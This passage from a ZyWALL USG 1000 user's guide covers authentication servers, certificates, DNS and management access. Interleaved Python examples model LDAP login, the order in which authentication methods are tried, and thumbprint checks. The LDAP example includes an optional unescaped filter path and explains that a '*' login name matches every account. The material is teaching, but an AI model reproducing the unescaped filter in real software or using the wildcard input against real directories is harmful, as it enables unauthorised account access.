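        matcher, rest = _parse(filt)
        if rest:
            raise ValueError("malformed filter: " + filt)
        return [dn for dn, attrs in self.entries.items()
                if dn.lower().endswith(base_dn.lower()) and matcher(attrs)]


@dataclass
class AaaServer:
    base_dn: str
    bind_dn: str
    bind_password: str
    login_attr: str = "sAMAccountName"
    alt_login_attr: str = "mail"
    group_attr: str = "memberOf"


@dataclass
class ExtGroupUser:
    name: str
    group_identifier: str  # value of the server's Group Membership Attribute


def authenticate(directory, server, ext_groups, login_name, password, escape=True):
    """Returns (authenticated, matching ext-group-user name or None, detail)."""
    if not directory.bind(server.bind_dn, server.bind_password):
        return False, None, "bind DN rejected"
    matches = directory.search(server.base_dn, login_filter(
        server.login_attr, server.alt_login_attr, login_name, escape))
    if len(matches) != 1:  # 0 = no such user, >1 = ambiguous: refuse both
        return False, None, f"{len(matches)} entries matched"
    user_dn = matches[0]
    if not directory.bind(user_dn, password):
        return False, None, "wrong password"
    groups = {g.lower() for g in directory.entries[user_dn].get(server.group_attr, ())}
    for ext in ext_groups:
        if ext.group_identifier.lower() in groups:
            return True, ext.name, user_dn
    return True, None, user_dn  # authenticated, but only the plain 'user' type


# Constructed directory contents, bind account and ext-group-user object.
DIRECTORY = FakeDirectory(
    entries={
        "CN=alice,OU=Staff,DC=example,DC=com": {
            "sAMAccountName": ["alice"], "mail": ["alice@example.com"],
            "memberOf": ["CN=VPN-Users,OU=Groups,DC=example,DC=com"]},
        "CN=admin,OU=Staff,DC=example,DC=com": {
            "sAMAccountName": ["admin"], "mail": ["admin@example.com"],
            "memberOf": ["CN=Domain Admins,OU=Groups,DC=example,DC=com"]},
    },
    passwords={
        "CN=svc-zywall,OU=Service,DC=example,DC=com": "bind-secret",
        "CN=alice,OU=Staff,DC=example,DC=com": "alice-pw",
        "CN=admin,OU=Staff,DC=example,DC=com": "admin-pw",
    })
SERVER = AaaServer("DC=example,DC=com",
                   "CN=svc-zywall,OU=Service,DC=example,DC=com", "bind-secret")
GROUPS = [ExtGroupUser("vpn-users", "CN=VPN-Users,OU=Groups,DC=example,DC=com")]
```

A login name of `*` finds nothing once escaped; without escaping the same filter matches every account under the Base DN, which is why the "exactly one match" check and the escaping belong together. The Bind DN account only needs read access to the login and group attributes; give it nothing more.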

Page 740: ...he address of the AD or LDAP server Base DN This specifies a directory For example o ZyXEL c US Host Enter the IP address in dotted decimal notation or the domain name up to 63 alphanumeric characters of a RADIUS server Authentication Port The default port of the RADIUS server for authentication is 1812 You need not change this value unless your network administrator instructs you to do so with ad...

Page 741: ... LABEL DESCRIPTION Name Enter a descriptive name up to 63 alphanumerical characters for identification purposes Description Enter the description of each server if any You can use up to 60 printable ASCII characters Server Address Enter the address of the RADIUS server Authentication Port Specify the port number on the RADIUS server to which the ZyWALL sends authentication requests Enter a number ...

Page 742: ...es attributes for its accounts Select the name and number of the attribute that the ZyWALL is to check to determine to which group a user belongs If it does not display select user defined and specify the attribute s number This attribute s value is called a group identifier it determines to which group a user belongs You can add ext group user user objects to identify groups based on these group ...

Page 743: ...h Method screens Section 45 2 on page 744 to create and manage authentication method objects Finding Out More See Section 7 6 3 on page 133 for an example of how to set up user authentication using a radius server 45 1 2 Before You Begin Configure AAA server objects see Chapter 44 on page 733 before you configure authentication method objects 45 1 3 Example Selecting a VPN Authentication Method Af...

Page 744: ... create up to 16 authentication method objects Figure 482 Configuration Object Auth Method The following table describes the labels in this screen Table 209 Configuration Object Auth Method LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and c...

Page 745: ...lumn is important. The ZyWALL authenticates users against the local user database or the external authentication servers in the order they appear in this screen. If two accounts with the same user name exist on two of the authentication servers you specify, the ZyWALL does not continue the search on the second server when the password you enter does not match the one on the first; the first server that knows the user name decides the login...

Page 746: ...yWALL confirms you want to remove it before doing so Move To change a method s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed The ordering of your methods is important as ZyWALL authenticates the users using the authentication methods in the order they appe...
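The ordering rule stated on pages 745 and 746, as an added example in Python (not ZyXEL's code): the servers listed in an authentication method are tried in order, and the search stops at the first server that knows the user name, even when the password is wrong there, so a later server cannot rescue the login. The backends are constructed in-memory stand-ins for the local database and the AAA server objects; the user names and passwords are made up for the demonstration.

```python
import hmac
from enum import Enum


class Result(Enum):
    OK = "ok"
    BAD_PASSWORD = "bad password"
    UNKNOWN_USER = "unknown user"


class Backend:
    """Stand-in for one entry in the method's list: the local database,
    an AD/LDAP server object or a RADIUS server object."""

    def __init__(self, name, users):
        self.name = name
        self.users = dict(users)  # user name -> password (constructed)

    def check(self, user, password):
        if user not in self.users:
            return Result.UNKNOWN_USER
        ok = hmac.compare_digest(self.users[user].encode(), password.encode())
        return Result.OK if ok else Result.BAD_PASSWORD


def authenticate(method, user, password):
    """method: ordered list of Backends. Returns (success, trail), where trail
    records which servers were consulted and what each one answered."""
    trail = []
    for backend in method:
        result = backend.check(user, password)
        trail.append((backend.name, result))
        if result is Result.UNKNOWN_USER:
            continue  # only an unknown name moves on to the next server
        return result is Result.OK, trail  # a known name: this server decides
    return False, trail


# Constructed method object: the local database first, then an LDAP server.
METHOD = [
    Backend("local", {"bob": "local-pw"}),
    Backend("ldap1", {"bob": "ldap-pw", "alice": "alice-pw"}),
]
```

The trail makes the consequence visible: bob's LDAP password is never consulted because the local database already has a bob, so a stale local account with a forgotten password locks that user out rather than falling through.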

Page 747: ...7 Add icon Click Add to add a new entry Click Edit to edit the settings of an entry Click Delete to delete an entry OK Click OK to save the changes Cancel Click Cancel to discard the changes Table 210 Configuration Object Auth Method Add continued LABEL DESCRIPTION ...


Page 749: ...d certificate. It also trusts any valid certificate signed by any of the certificates that you have imported as a trusted certificate. 46 1 2 What You Need to Know. When using public key cryptography for authentication, each host has two keys. One key is public and can be made openly available. The other key is private and must be kept secure. These keys work like a handwritten signature; in fact, certificat...

Page 750: ...lgorithm The certification authority uses its private key to sign certificates Anyone can then use the certification authority s public key to verify the certificates A certification path is the hierarchy of certification authority certificates that validate a certificate The ZyWALL does not trust a certificate if any certificate on its path has expired or been revoked Certification authorities ma...

Page 751: ...s and numerals to convert a binary PKCS 7 certificate into a printable form Binary PKCS 12 This is a format for transferring public key and private key certificates The private key in a PKCS 12 file is within a password encrypted envelope The file s password is not connected to your certificate s public or private passwords Exporting a PKCS 12 file creates this and you must provide it to decrypt t...

Page 752: ...pen the Certificate window. Click the Details tab and scroll down to the Thumbprint Algorithm and Thumbprint fields. Figure 485 Certificate Details. 4 Use a secure method to verify that the certificate owner has the same information in the Thumbprint Algorithm and Thumbprint fields. The secure method may vary based on your situation. Possible examples would be over the telephone or through an HTTPS con...
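Steps 3 and 4 above, as an added example in Python (not from the guide): compute the thumbprint from the certificate file yourself and compare it with the value the owner reads out. The thumbprint is a hash of the certificate's DER bytes, so the PEM armour is stripped and base64-decoded first; Windows shows it as SHA-1 with spaces between the bytes, which the comparison ignores. The PEM block below is constructed (its payload is only the bytes "abc"), not a real certificate.

```python
import base64
import hashlib
import hmac
import re


def pem_to_der(pem):
    """Strip the PEM armour and decode the base64 body to the DER bytes that
    the thumbprint is actually computed over."""
    m = re.search(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
                  pem, re.S)
    if not m:
        raise ValueError("no CERTIFICATE block in input")
    return base64.b64decode("".join(m.group(1).split()), validate=True)


def thumbprint(der, algorithm="sha1"):
    """Hex thumbprint as the Details tab shows it (sha1 by default)."""
    return hashlib.new(algorithm, der).hexdigest()


def normalize(shown):
    """Accept 'A9 99 3E ...' or 'a9:99:3e:...' as read out by the owner."""
    return re.sub(r"[^0-9a-f]", "", shown.lower())


def thumbprint_matches(der, shown, algorithm="sha1"):
    """Constant-time comparison of the computed and the quoted thumbprint."""
    return hmac.compare_digest(thumbprint(der, algorithm), normalize(shown))


# Constructed stand-in: a PEM block whose payload is just the bytes b"abc".
CONSTRUCTED_PEM = """-----BEGIN CERTIFICATE-----
YWJj
-----END CERTIFICATE-----
"""
```

Compare the whole thumbprint, not the first few bytes, and read back the algorithm as well: a SHA-1 value and a SHA-256 value of the same certificate look nothing alike, and a mismatch there is not evidence of tampering.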

Page 753: ...ate or a certification request Edit Double click an entry or select it and click Edit to open a screen with an in depth list of information about the certificate Remove The ZyWALL keeps all of your certificates unless you specifically delete them Uploading a new firmware or default configuration file does not delete your certificates To remove an entry select it and click Remove The ZyWALL confirm...

Page 754: ...such as CN Common Name OU Organizational Unit or department O Organization or company and C Country It is recommended that each certificate have unique subject information Issuer This field displays identifying information about the certificate s issuing certification authority such as a common name organizational unit or department organization or company and country With self signed certificates...

Page 755: ... ZyWALL USG 1000 User s Guide 755 ZyWALL create a self signed certificate enroll a certificate with a certification authority or generate a certification request Figure 487 Configuration Object Certificate My Certificates Add ...

Page 756: ...hich the certificate owner belongs You can use up to 31 characters You can use alphanumeric characters the hyphen and the underscore Organization Identify the company or group to which the certificate owner belongs You can use up to 31 characters You can use alphanumeric characters the hyphen and the underscore Town City Identify the town or city where the certificate owner is located You can use ...

Page 757: ...hen you select Create a certification request and enroll for a certificate immediately online Select the certification authority s enrollment protocol from the drop down list box Simple Certificate Enrollment Protocol SCEP is a TCP based enrollment protocol that was developed by VeriSign and Cisco Certificate Management Protocol CMP is a TCP based enrollment protocol that was developed by the Publ...

Page 758: ...you select Create a certification request and enroll for a certificate immediately online the certification authority may want you to include a reference number and key to identify you when you send a certification request Fill in both the Reference Number and the Key fields if your certification authority uses the CMP enrollment protocol Just the Key field displays if your certification authority...

Page 759: ...t Screen Click Configuration Object Certificate My Certificates and then the Edit icon to open the My Certificate Edit screen You can use this screen to view in depth certificate information and change the certificate s name Figure 488 Configuration Object Certificate My Certificates Edit ...

Page 760: ...rtificate s owner signed the certificate not a certification authority X 509 means that this certificate was created and signed according to the ITU T X 509 recommendation that defines the formats for public key certificates Version This field displays the X 509 version number Serial Number This field displays the certificate s identification number given by the certification authority or generate...

Page 761: ...ficate into a printable form You can copy and paste a certification request into a certification authority s web page an e mail that you send to the certification authority or a text editor and save the file on a management computer for later manual enrollment You can copy and paste a certificate into an e mail to send to friends or colleagues or you can copy and paste a certificate into a text ed...

Page 762: ...reen You must remove any spaces from the certificate s filename before you can import it Figure 489 Configuration Object Certificate My Certificates Import The following table describes the labels in this screen OK Click OK to save your changes back to the ZyWALL You can only change the name Cancel Click Cancel to quit and return to the My Certificates screen Table 213 Configuration Object Certifi...

Page 763: ...rtificate on the ZyWALL Cancel Click Cancel to quit and return to the My Certificates screen Table 214 Configuration Object Certificate My Certificates Import continued LABEL DESCRIPTION Table 215 Configuration Object Certificate Trusted Certificates LABEL DESCRIPTION PKI Storage Space in Use This bar displays the percentage of the ZyWALL s PKI storage space that is currently in use When the stora...

Page 764: ...ying information about the certificate s owner such as CN Common Name OU Organizational Unit or department O Organization or company and C Country It is recommended that each certificate have unique subject information Issuer This field displays identifying information about the certificate s issuing certification authority such as a common name organizational unit or department organization or co...

Page 765: ...authority s list of revoked certificates before trusting a certificate issued by the certification authority Figure 491 Configuration Object Certificate Trusted Certificates Edit ...

Page 766: ...SCP or LDAP server details OCSP Server Select this check box if the directory server uses OCSP Online Certificate Status Protocol URL Type the protocol IP address and pathname of the OCSP server ID The ZyWALL may need to authenticate itself in order to access the OCSP server Type the login name up to 31 ASCII characters from the entity maintaining the server usually a certification authority Passw...

Page 767: ... hash algorithm Valid From This field displays the date that the certificate becomes applicable The text displays in red and includes a Not Yet Valid message if the certificate has not yet become applicable Valid To This field displays the date that the certificate expires The text displays in red and includes an Expiring or Expired message if the certificate is about to expire or has already expi...

Page 768: ...ate Certificate in PEM Base 64 Encoded Format This read only text box displays the certificate or certification request in Privacy Enhanced Mail PEM format PEM uses lowercase letters uppercase letters and numerals to convert a binary certificate into a printable form You can copy and paste the certificate into an e mail to send to friends or colleagues or you can copy and paste the certificate int...

Page 769: ... network traffic since the ZyWALL only gets information on the certificates that it needs to verify not a huge list When the ZyWALL requests certificate status information the OCSP server returns an expired current or unknown response Table 217 Configuration Object Certificate Trusted Certificates Import LABEL DESCRIPTION File Path Type in the location of the file you want to upload in this field o...

Page 771: ... Section 13 4 on page 292 for information about PPPoE PPTP interfaces See Section 6 6 on page 112 for related information on these screens 47 1 1 What You Can Do in this Chapter Use the Object ISP Account screens Section 47 2 on page 771 to create and manage ISP accounts in the ZyWALL 47 2 ISP Account Summary This screen provides a summary of ISP accounts in the ZyWALL To access this screen click ...

Page 772: ...to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This ...

Page 773: ...ZyWALL accepts MSCHAP V2 only Encryption Method This field is available if this ISP account uses the PPTP protocol Use the drop down list box to select the type of Microsoft Point to Point Encryption MPPE Options are nomppe This ISP account does not use MPPE mppe 40 This ISP account uses 40 bit MPPE mppe 128 This ISP account uses 128 bit MPPE User Name Type the user name given to you by your ISP P...

Page 774: ...disconnects from the PPPoE PPTP server This value must be an integer between 0 and 360 If this value is zero this timeout is disabled OK Click OK to save your changes back to the ZyWALL If there are no errors the program returns to the ISP Account screen If there are errors a message box explains the error and the program stays in the ISP Account Edit screen Cancel Click Cancel to return to the IS...

Page 775: ...emote users to access an application via standard web browsers Section 48 2 1 on page 778 You can also use the SSL Application Edit screen to specify the name of a folder on a Linux or Windows file server which remote users can access using a standard web browser Section 48 2 2 on page 780 48 1 2 What You Need to Know Application Types You can configure the following types of SSL applications on t...

Page 776: ...ter does not use VNC or RDP client software The ZyWALL works with the following remote desktop connection software RDP Windows Remote Desktop supported in Internet Explorer VNC RealVNC TightVNC UltraVNC For example user A uses an SSL VPN connection to log into the ZyWALL Then he manages LAN computer B which has RealVNC server software installed Figure 495 SSL protected Remote Management Weblinks Y...

Page 777: ...info Select Web Page Encryption to prevent users from saving the web content Click Apply to save the settings The configuration screen should look similar to the following figure Figure 496 Example SSL Application Specifying a Web Site for Access 48 2 The SSL Application Screen The main SSL Application screen displays a list of the configured SSL application objects Click Configuration Object SSL ...

Page 778: ... LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3...

Page 779: ... Virtual Network Computing remote desktop server software installed Select RDP to allow users to manage LAN computers that have Remote Desktop Protocol remote desktop server software installed Select Weblink to create a link to a web site that you expect the SSL VPN users to commonly use Name Enter a descriptive name to identify this object You can enter up to 31 characters 0 9 a z A Z and _ Space...

Page 780: ...s set to RDP or VNC Specify the IP address or Fully Qualified Domain Name FQDN of the computer s that you want to allow the remote users to manage Starting Port Ending Port This field displays if the Server Type is set to RDP or VNC Specify the listening ports of the LAN computer s running remote desktop server software The ZyWALL uses a port number from this range to send traffic to the LAN compu...

Page 781: ... 31 characters 0 9 a z A Z and _ Spaces are not allowed Shared Path Specify the IP address domain name or NetBIOS name computer name of the file server and the name of the share to which you want to allow user access Enter the path in one of the following formats IP address share name domain name share name computer name share name For example if you enter my server Tmp this allows remote users to...

Page 783: ...ndpoint security objects to use with the authentication policy and SSL VPN features For example an authentication policy could use an endpoint security object that requires a LAN user s computer to pass all of the object s checking items in order to access the network LAN user A passes all of the checks and is given access An SSL VPN tunnel could use a different endpoint security profile that only...

Page 784: ...ation Windows registry settings Processes that the endpoint must execute Processes that the endpoint cannot execute The size and version of specific files Multiple Endpoint Security Objects You can configure an authentication policy or SSL VPN policy to use multiple endpoint security objects This allows checking of computers with different OSs or security settings When a client attempts to log in ...

Page 785: ...ry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the object See Section 13 3 2 on page 291 for an example Object Name This field displays the descriptive name that identifies this object Description If the entry has...

Page 786: ...Apply Click this button to save your changes to the ZyWALL Reset Click this button to return the screen to its last saved settings Table 223 Configuration Object Endpoint Security continued LABEL DESCRIPTION ...

Page 787: ...49 3 Endpoint Security Add Edit Click Configuration Object Endpoint Security and then the Add or Edit icon to open the Endpoint Security Edit screen Use this screen to configure an endpoint security object ...

Page 788: ...Figure 502 Configuration Object Endpoint Security Add ...

Page 789: ...ers allows access for computers not using Windows Linux or Mac OSX operating systems For example you create Windows Linux and Mac OSX endpoint security objects to apply to your LAN users An others object allows access for LAN computers using Solaris HP Android or other operating systems Windows Version If you selected Windows as the operating system select the version of Windows here Endpoint must...

Page 790: ...s Registry If you selected Windows as the operating system you can use the table to list Windows registry values to check on the user s computer Use the Operation field to set whether the value for the registry item in the user s computer has to be equal to greater than less than greater than or equal to less than or equal to or not equal to the value listed in the entry Click Add to create a new ...

Page 791: ...be equal to greater than less than greater than or equal to less than or equal to or not equal to the size or version of the file listed in the entry Click Add to create a new entry Select one or more entries and click Remove to delete it or them The user s computer must pass one of the listed file information checks to pass this checking item OK Click OK to save your changes back to the ZyWALL Ca...

Page 793: ...omain name to its corresponding IP address and vice versa Use the System WWW screens see Section 50 7 on page 808 to configure settings for HTTP or HTTPS access to the ZyWALL and how the login and access user screens look Use the System SSH screen see Section 50 8 on page 825 to configure SSH Secure SHell used to securely access the ZyWALL s command line interface You can specify which zones allow...

Page 794: ...ge 840 to allow your ZyWALL to be managed by the Vantage CNM server Use the System Language screen see Section 50 14 on page 843 to set a language for the ZyWALL s Web Configurator screens Note See each section for related background information and term definitions 50 2 Host Name A host name is the unique name by which a device is known on a network Click Configuration System Host Name to open th...

Page 795: ...k Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 225 Configuration System Host Name continued LABEL DESCRIPTION Table 226 Configuration System USB Storage LABEL DESCRIPTION Activate USB storage service Turn USB storage on or off You need to enable USB storage both here and for a specific feature such as system logs or diagnosti...

Page 796: ...time based on your local time zone and date click Configuration System Date Time The screen displays as shown You can manually set the ZyWALL s time and date or have the ZyWALL get the date and time from a time server Figure 505 Configuration System Date and Time The following table describes the labels in this screen Table 227 Configuration System Date and Time LABEL DESCRIPTION Current Time and ...

Page 797: ...ck this button to have the ZyWALL get the time and date from a time server see the Time Server Address field This also saves your changes except the daylight saving settings Time Zone Setup Time Zone Choose the time zone of your location This will set the time difference between your time zone and Greenwich Mean Time GMT Enable Daylight Saving Daylight saving is a period from late spring to early ...

Page 798: ...ing Time ends in the United States on the first Sunday of November Each time zone in the United States stops using Daylight Saving Time at 2 A M local time So in the United States you would select First Sunday November and type 2 in the at field Daylight Saving Time ends in the European Union on the last Sunday of October All of the time zones in the European Union stop using Daylight Saving Time ...

Page 799: ...nfiguring the Date Time screen To manually set the ZyWALL date and time 1 Click System Date Time 2 Select Manual under Time and Date Setup 3 Enter the ZyWALL s time in the New Time field 4 Enter the ZyWALL s date in the New Date field 5 Under Time Zone Setup select your Time Zone from the list 6 As an option you can select the Enable Daylight Saving check box to adjust the ZyWALL clock for dayligh...

Page 800: ...S Overview DNS Domain Name System is for mapping a domain name to its corresponding IP address and vice versa The DNS server is extremely important because without it you must know the IP address of a machine before you can access it Table 229 Configuration System Console Speed LABEL DESCRIPTION Console Port Speed Use the drop down list box to change the speed of the console port Your ZyWALL suppo...

Page 801: ... WAN IP address set the DNS server fields to get the DNS server address from the ISP You can manually enter the IP addresses of other DNS servers 50 6 2 Configuring the DNS Screen Click Configuration System DNS to change your ZyWALL s DNS settings Use the DNS screen to configure the ZyWALL to use a DNS server to resolve domain names for ZyWALL system features like VPN DDNS and the time server You ...

Page 802: ...ne forwarder entries in the order that they appear in this list Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subs...

Page 803: ...elect an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numb...

Page 804: ...in The ZyWALL allows you to configure address records about the ZyWALL itself or another device This way you can keep a record of DNS names and addresses that people on your network may use frequently If the ZyWALL receives a DNS query for an FQDN for which the ZyWALL has an address record the ZyWALL can send the IP address in a DNS response without having to query a DNS name server 50 6 4 PTR Rec...

Page 805: ...orwarder record Figure 510 Configuration System DNS Domain Zone Forwarder Add Table 231 Configuration System DNS Address PTR Record Edit LABEL DESCRIPTION FQDN Type a Fully Qualified Domain Name FQDN of a server An FQDN starts with a host name and continues all the way up to the top level domain name For example www zyxel com tw is a fully qualified domain name where www is the host zyxel is the t...

Page 806: ...fied DNS server s DNS Server Select DNS Server s from ISP if your ISP dynamically assigns DNS server information You also need to select an interface through which the ISP provides the DNS server IP address es The interface should be activated and set to be a DHCP client The fields below display the read only DNS server IP address es that the ISP assigns N A displays for any DNS server IP address ...

Page 807: ...ice Control table to add a service control rule Figure 512 Configuration System DNS Service Control Rule Add Table 233 Configuration System DNS MX Record Add LABEL DESCRIPTION Domain Name Enter the domain name where the mail is destined for IP Address FQDN Enter the IP address or Fully Qualified Domain Name FQDN of a mail server that handles the mail for the domain specified in the field above OK ...

Page 808: ...guration System DNS Service Control Rule Add LABEL DESCRIPTION Create new Object Use this to configure any new settings objects that you need to use in this screen Address Object Select ALL to allow or deny any computer to send DNS queries to the ZyWALL Select a predefined address object to just allow or deny the computer with the IP address that you specified to send DNS queries to the ZyWALL Zon...

Page 809: ...re is a lease timeout for administrators The ZyWALL automatically logs you out if the management session remains idle for longer than this timeout period The management session does not time out when a statistics screen is polling Each user is also forced to log in to the ZyWALL for authentication again when the reauthentication time expires You can change the timeout settings in the User Group scree...

Page 810: ...ificates is optional and if selected means the HTTPS client must send the ZyWALL a certificate You must apply for a certificate for the browser from a CA that is a trusted CA on the ZyWALL Please refer to the following figure 1 HTTPS connection requests from an SSL aware web browser go to port 443 by default on the ZyWALL s web server 2 HTTP connection requests from a web browser go to port 80 by ...

Page 811: ...PN for example Figure 515 Configuration System WWW Service Control The following table describes the labels in this screen Table 235 Configuration System WWW Service Control LABEL DESCRIPTION HTTPS Enable Select the check box to allow or disallow the computer with the IP address that matches the IP address es in the Service Control table to access the ZyWALL Web Configurator using secure HTTPS con...

Page 812: ...HTTPS to log into the ZyWALL to log into SSL VPN for example You can also specify the IP addresses from which the users can access the ZyWALL Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click R...

Page 813: ...emove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This is the index number of the service control ru...

Page 814: ...Table 236 Configuration System Service Control Rule Edit LABEL DESCRIPTION Create new Object Use this to configure any new settings objects that you need to use in this screen Address Object Select ALL to allow or deny any computer to communicate with the ZyWALL using this service Select a predefined address object to just allow or deny the computer with the IP address that you specified to access...

Page 815: ...also customize the page that displays after an access user logs into the Web Configurator to access network services like the Internet See Chapter 40 on page 699 for more on access user accounts Figure 517 Configuration System WWW Login Page ...

Page 816: ...he login and access pages Figure 518 Login Page Customization Figure 519 Access Page Customization You can specify colors in one of the following ways Logo Title Message Note Message Background last line of text color of all text Logo Title Message Note Message Window last line of text color of all text Background ...

Page 817: ...and file name of the logo graphic or click Browse to locate it Note Use a GIF JPG or PNG of 100 kilobytes or less Click Upload to transfer the specified graphic file from your computer to the ZyWALL Customized Login Page Use this section to set how the Web Configurator login screen looks Title Enter the title for the top of the screen Use up to 64 printable ASCII characters Spaces are allowed Titl...

Page 818: ...reen in Internet Explorer Select Yes to proceed to the Web Configurator login screen if you select No then Web Configurator access is blocked Figure 520 Security Alert Dialog Box Internet Explorer Note Message Enter a note to display below the title Use up to 64 printable ASCII characters Spaces are allowed Window Background Set how the window s background looks To use a graphic select Picture and...

Page 819: ...tificate is from the ZyWALL If Accept this certificate temporarily for this session is selected then click OK to continue in Netscape Select Accept this certificate permanently to import the ZyWALL s certificate into the SSL client Figure 521 Security Certificate 1 Netscape Figure 522 Security Certificate 2 Netscape 50 7 7 3 Avoiding Browser Warning Messages Here are the main reasons your browser ...

Page 820: ...tes issued by a certificate authority import the certificate authority s certificate into your operating system as a trusted certificate Refer to Appendix D on page 987 for details 50 7 7 4 Login Screen After you accept the certificate the ZyWALL login screen appears The lock displayed in the bottom of the browser status bar denotes a secure connection Figure 523 Login Screen Internet Explorer 50 ...

Page 821: ...d CA Screen The CA sends you a package containing the CA s trusted certificate s your personal certificate s and a password to install the personal certificate s 50 7 7 5 1 Installing the CA s Certificate 1 Double click the CA s trusted certificate to produce a screen similar to the one shown next Figure 525 CA Certificate Example 2 Click Install Certificate and follow the wizard as shown earlier ...

Page 822: ...Double click the personal certificate given to you by the CA to produce a screen similar to the one shown next 1 Click Next to begin the wizard Figure 526 Personal Certificate Import Wizard 1 2 The file name and path of the certificate you double clicked should automatically appear in the File name text box Click Browse if you wish to import a different certificate Figure 527 Personal Certificate ...

Page 823: ... you by the CA Figure 528 Personal Certificate Import Wizard 3 4 Have the wizard determine where the certificate should be saved on your computer or select Place all certificates in the following store and choose a different location Figure 529 Personal Certificate Import Wizard 4 ...

Page 824: ...u should see the following screen when the certificate is correctly installed on your computer Figure 531 Personal Certificate Import Wizard 6 50 7 7 6 Using a Certificate When Accessing the ZyWALL Example Use the following procedure to access the ZyWALL via HTTPS 1 Enter https ZyWALL IP Address in your browser s web address field Figure 532 Access the ZyWALL Via HTTPS ...

Page 825: ...yWALL This screen displays even if you only have a single certificate as in the example Figure 533 SSL Client Authentication 3 You next see the Web Configurator login screen Figure 534 Secure Web Configurator Login Screen 50 8 SSH You can use SSH Secure SHell to securely access the ZyWALL s command line interface Specify which zones allow SSH access and from which IP address the access can come ...

Page 826: ...AN Example 50 8 1 How SSH Works The following figure is an example of how a secure connection is established between two remote hosts using SSH v1 Figure 536 How SSH v1 Works Example 1 Host Identification The SSH client sends a connection request to the SSH server The server identifies itself with a host key The client encrypts a randomly generated session key with the host key and server key and ...

Page 827: ... 50 8 2 SSH Implementation on the ZyWALL Your ZyWALL supports SSH versions 1 and 2 using RSA authentication and four encryption methods AES 3DES Arcfour and Blowfish The SSH server is implemented on the ZyWALL for management using port 22 by default 50 8 3 Requirements for Using SSH You must install an SSH client program on a client computer Windows or Linux operating system that is used to conne...

Page 828: ... needed however you must use the same port number in order to use that service for remote management Server Certificate Select the certificate whose corresponding private key is to be used to identify the ZyWALL for SSH connections You must have certificates already configured in the My Certificates screen Click My Certificates and see Chapter 46 on page 749 for details Service Control This specif...

Page 829: ...e the host key in your computer Click Yes to continue Figure 538 SSH Example 1 Store Host Key Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This is the index number of the service control rule Zone This is the zone on the ZyWALL the u...

Page 830: ...L using SSH version 1 If this is the first time you are connecting to the ZyWALL using SSH a message displays prompting you to save the host information of the ZyWALL Type yes and press ENTER Then enter the password to log in to the ZyWALL Figure 540 SSH Example 2 Log in 3 The CLI screen displays next 50 9 Telnet You can use Telnet to access the ZyWALL s command line interface Specify which zones ...

Page 831: ...rt number for a service if needed however you must use the same port number in order to use that service for remote management Service Control This specifies from which computers you can access which ZyWALL zones Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Refer to Table 236 on page 814 for details on the screen that opens Edit ...

Page 832: ...on configurable default policy The ZyWALL applies this to traffic that does not match any other configured rule It is not an editable rule To apply other behavior configure a rule that traffic will match so the ZyWALL will not have to use the default policy Zone This is the zone on the ZyWALL the user is allowed or denied to access Address This is the object name of the IP address es with which th...

Page 833: ... if needed however you must use the same port number in order to use that service for remote management Server Certificate Select the certificate whose corresponding private key is to be used to identify the ZyWALL for FTP connections You must have certificates already configured in the My Certificates screen Click My Certificates and see Chapter 46 on page 749 for details Service Control This spe...

Page 834: ...th a hyphen instead of a number is the ZyWALL s non configurable default policy The ZyWALL applies this to traffic that does not match any other configured rule It is not an editable rule To apply other behavior configure a rule that traffic will match so the ZyWALL will not have to use the default policy Zone This is the zone on the ZyWALL the user is allowed or denied to access Address This is t...

Page 835: ...twork management functions It executes applications that control and monitor managed devices The managed devices contain object variables managed objects that define each piece of information to be collected about a device Examples of variables include the number of packets received node port status etc A Management Information Base MIB is a collection of managed objects SNMP allows a manager ...

Page 836: ...al throughput The focus of the MIBs is to let administrators collect statistical data and monitor status and performance You can download the ZyWALL s MIBs from www zyxel com 50 11 2 SNMP Traps The ZyWALL will send traps to the SNMP manager when any one of the following events occurs 50 11 3 Configuring SNMP To change your ZyWALL s SNMP settings click Configuration System SNMP tab The screen appea...

Page 837: ...mber for a service if needed however you must use the same port number in order to use that service for remote management Get Community Enter the Get Community which is the password for the incoming Get and GetNext requests from the management station The default is public and allows all requests Set Community Enter the Set community which is the password for incoming Set requests from the managem...

Page 838: ...select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subsequent entries move up by one when you take this action Move To change an entry s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed This is the index number of the ...

Page 839: ...nt connections Figure 545 Configuration System Dial in Mgmt The following table describes the labels in this screen Table 243 Configuration System Dial in Mgmt LABEL DESCRIPTION Show Advance Settings Hide Advance Settings Click this button to display a greater or lesser number of configuration fields Dial in Server Properties Click Advanced to display more configuration fields and edit the details...

